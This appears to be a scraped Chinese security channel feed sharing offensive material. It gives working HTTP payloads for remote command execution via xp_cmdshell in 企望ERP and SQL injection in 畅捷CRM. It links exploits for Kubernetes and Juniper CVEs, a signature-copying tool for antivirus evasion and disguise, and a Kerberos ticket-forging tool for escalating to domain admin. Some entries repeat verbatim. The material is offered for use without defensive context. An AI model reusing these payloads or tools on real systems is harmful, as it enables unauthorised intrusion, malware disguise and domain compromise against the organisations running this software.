👍21❤4🔥4👏3😁2👎1
企望ERP系统 RCE
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
👍10❤5
Kubernetes 中的命令注入漏洞-CVE-2023-3676
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2023-3676
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2023-3676
❤5
Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
https://github.com/langsasec/Sign-Sacker
https://github.com/langsasec/Sign-Sacker
GitHub
GitHub - langsasec/Sign-Sacker: Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。 - langsasec/Sign-Sacker
👍6❤4😁2
Juniper 防火墙RCE
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
❤9👍9
畅捷CRM get_usedspace.php SQL注入漏洞 poc
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
👍17❤12
SeTcbPrivilege允许您读取LSA存储,从TGT中提取会话密钥,并伪造请求TGS
使用Kerberos TGS从本地管理员到域管理员
https://github.com/foxlox/GIUDA
使用Kerberos TGS从本地管理员到域管理员
https://github.com/foxlox/GIUDA
GitHub
GitHub - foxlox/GIUDA: Ask a TGS on behalf of another user without password
Ask a TGS on behalf of another user without password - foxlox/GIUDA
👍16❤10